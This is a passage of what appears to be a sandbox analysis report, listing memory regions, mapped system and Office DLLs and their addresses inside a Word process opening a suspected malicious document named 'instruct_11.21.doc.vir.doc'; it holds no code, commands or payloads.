id = 402 start_va = 0x69170000 end_va = 0x692dafff monitored = 0 entry_point = 0x691de360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 403 start_va = 0x692e0000 end_va = 0x6af41fff monitored = 0 entry_point = 0x692e1000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\wwlib.dll") Region: id = 404 start_va = 0x6b140000 end_va = 0x6b162fff monitored = 0 entry_point = 0x6b1569b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 405 start_va = 0x6b170000 end_va = 0x6b190fff monitored = 0 entry_point = 0x6b17bdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 406 start_va = 0x6b1a0000 end_va = 0x6b994fff monitored = 0 entry_point = 0x6b205279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\chart.dll") Region: id = 407 start_va = 0x6b9a0000 end_va = 0x6ba32fff monitored = 0 entry_point = 0x6b9c0ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 408 start_va = 0x6ba40000 end_va = 0x6baa6fff monitored = 0 entry_point = 0x6ba55a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 409 start_va = 0x6bab0000 end_va = 0x6bc51fff monitored = 0 entry_point = 0x6bab1000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\riched20.dll") Region: id = 410 start_va = 0x6bc60000 end_va = 0x6bc75fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 411 start_va = 0x6bc80000 end_va = 0x6bc88fff monitored = 0 entry_point = 0x6bc83830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 412 start_va = 0x6bc90000 end_va = 0x6bcc3fff monitored = 0 entry_point = 0x6bca8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 413 start_va = 0x6bcd0000 end_va = 0x6bcd7fff monitored = 0 entry_point = 0x6bcd17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 414 start_va = 0x6bce0000 end_va = 0x6bd58fff monitored = 1 entry_point = 0x6bcef82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 415 start_va = 0x6bd60000 end_va = 0x6bdb8fff monitored = 1 entry_point = 0x6bd70780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 416 start_va = 0x6bdc0000 end_va = 0x6bf32fff monitored = 0 entry_point = 0x6be6d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 417 start_va = 0x6bf40000 end_va = 0x6bf9bfff monitored = 0 entry_point = 0x6bf48880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 418 start_va = 0x6bfa0000 end_va = 0x6bfcbfff monitored = 0 entry_point = 0x6bfc24b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 419 start_va = 0x6bfd0000 end_va = 0x6c0e7fff monitored = 0 entry_point = 0x6bfd40b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msptls.dll") Region: id = 420 start_va = 0x6c0f0000 end_va = 0x6c133fff monitored = 0 entry_point = 0x6c10aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 421 start_va = 0x6c140000 end_va = 0x6c20afff monitored = 0 entry_point = 0x6c156a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 422 start_va = 0x6c210000 end_va = 0x6c274fff monitored = 0 entry_point = 0x6c22fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 423 start_va = 0x6c280000 end_va = 0x6c360fff monitored = 0 entry_point = 0x6c2ae6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 424 start_va = 0x6c370000 end_va = 0x6c384fff monitored = 0 entry_point = 0x6c37b1a0 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 425 start_va = 0x6c390000 end_va = 0x6c544fff monitored = 0 entry_point = 0x6c483d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 426 start_va = 0x6c550000 end_va = 0x6c55efff monitored = 0 entry_point = 0x6c552a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 427 start_va = 0x6c560000 end_va = 0x6c565fff monitored = 0 entry_point = 0x6c561490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 428 start_va = 0x6c570000 end_va = 0x6c5dcfff monitored = 0 entry_point = 0x6c5aab20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 429 start_va = 0x6c5e0000 end_va = 0x6c60cfff monitored = 0 entry_point = 0x6c5f2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 430 start_va = 0x6c610000 end_va = 0x6c642fff monitored = 0 entry_point = 0x6c620e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 431 start_va = 0x6c650000 end_va = 0x6c659fff monitored = 0 entry_point = 0x6c653200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 432 start_va = 0x6c6a0000 end_va = 0x6c8b7fff monitored = 0 entry_point = 0x6c7497b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 433 start_va = 0x6cdc0000 end_va = 0x6ce66fff monitored = 0 entry_point = 0x6cdf6240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 434 start_va = 0x6cec0000 end_va = 0x6d0b0fff monitored = 0 entry_point = 0x6cfa3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 435 start_va = 0x6d0c0000 end_va = 0x6d54dfff monitored = 0 entry_point = 0x6d44a320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 436 start_va = 0x6ea60000 end_va = 0x6ea7cfff monitored = 0 entry_point = 0x6ea63b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 437 start_va = 0x6eaf0000 end_va = 0x6ecfefff monitored = 0 entry_point = 0x6eb9b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 438 start_va = 0x6fe10000 end_va = 0x6fe3efff monitored = 0 entry_point = 0x6fe295e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 439 start_va = 0x6fe40000 end_va = 0x6fe52fff monitored = 0 entry_point = 0x6fe49950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 440 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 441 start_va = 0x70020000 end_va = 0x70038fff monitored = 0 entry_point = 0x700247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 442 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 443 start_va = 0x713a0000 end_va = 0x7158efff monitored = 0 entry_point = 0x713e5e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 444 start_va = 0x71680000 end_va = 0x716d1fff monitored = 0 entry_point = 0x716a8290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 445 start_va = 0x716e0000 end_va = 0x71811fff monitored = 0 entry_point = 0x7174bf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 446 start_va = 0x71e90000 end_va = 0x71f12fff monitored = 0 entry_point = 0x71eb37c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 447 start_va = 0x71f20000 end_va = 0x7206afff monitored = 0 entry_point = 0x71f81660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 448 start_va = 0x720d0000 end_va = 0x722e9fff monitored = 0 entry_point = 0x72165550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 449 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 450 start_va = 0x73c50000 end_va = 0x73d1cfff monitored = 0 entry_point = 0x73ca29c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 451 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 452 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 453 start_va = 0x74120000 end_va = 0x7423efff monitored = 0 entry_point = 0x74165980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 454 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 455 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 456 start_va = 0x74360000 end_va = 0x743e3fff monitored = 0 entry_point = 0x74386220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 457 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 458 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 459 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 460 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 461 start_va = 0x75e90000 end_va = 0x75eeefff monitored = 0 entry_point = 0x75e94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 462 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 463 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 464 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 465 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 466 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 467 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 468 start_va = 0x76a30000 end_va = 0x76a89fff monitored = 0 entry_point = 0x76a57e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 469 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 470 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 471 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 472 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 473 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 474 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 475 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 476 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 477 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 478 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 479 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 480 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 481 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 482 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 483 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 484 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 485 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 486 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 487 start_va = 0x2560000 end_va = 0x2560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002560000" filename = "" Region: id = 488 start_va = 0x703b0000 end_va = 0x7052dfff monitored = 0 entry_point = 0x7042c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 489 start_va = 0x71af0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71d2c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 490 start_va = 0x2560000 end_va = 0x2560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002560000" filename = "" Region: id = 491 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 492 start_va = 0x84f0000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "instruct_11.21.doc.vir.docb2f7aa403c502f54e26337c606044c2f205394doc3c502f54e26337c606044c2f205394doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.docb2f7aa403c502f54e26337c606044c2f205394doc3c502f54e26337c606044c2f205394doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\instruct_11.21.doc.vir.docb2f7aa403c502f54e26337c606044c2f205394doc3c502f54e26337c606044c2f205394doc") Region: id = 493 start_va = 0x6b020000 end_va = 0x6b029fff monitored = 0 entry_point = 0x6b022a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\wordcnvpxy.cnv") Region: id = 494 start_va = 0x6b020000 end_va = 0x6b029fff monitored = 0 entry_point = 0x6b022a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\wordcnvpxy.cnv") Region: id = 495 start_va = 0x6b020000 end_va = 0x6b02bfff monitored = 0 entry_point = 0x6b0228fd region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\RECOVR32.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 496 start_va = 0x6b000000 end_va = 0x6b01ffff monitored = 0 entry_point = 0x6b00c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll") Region: id = 497 start_va = 0x6aff0000 end_va = 0x6b021fff monitored = 0 entry_point = 0x6b00c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 498 start_va = 0x6afd0000 end_va = 0x6afeffff monitored = 0 entry_point = 0x6afdc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll") Region: id = 499 start_va = 0x6aff0000 end_va = 0x6b02efff monitored = 0 entry_point = 0x6b014c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 500 start_va = 0x6afd0000 end_va = 0x6afeffff monitored = 0 entry_point = 0x6afdc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll") Region: id = 501 start_va = 0x6aff0000 end_va = 0x6b021fff monitored = 0 entry_point = 0x6b00c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 502 start_va = 0x6afd0000 end_va = 0x6afeffff monitored = 0 entry_point = 0x6afdc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll") Region: id = 503 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 504 start_va = 0x84f0000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "instruct_11.21.doc.vir.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\instruct_11.21.doc.vir.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\instruct_11.21.doc.vir.doc") Region: id = 505 start_va = 0x6aff0000 end_va = 0x6b02efff monitored = 0 entry_point = 0x6b014c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 506 start_va = 0x6afd0000 end_va = 0x6afeffff monitored = 0 entry_point = 0x6afdc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll") Region: id = 507 start_va = 0xfba0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fba0000" filename = "" Region: id = 508 start_va = 0x2570000 end_va = 0x2578fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "instruct_11.21.doc.vir.doc" filename = 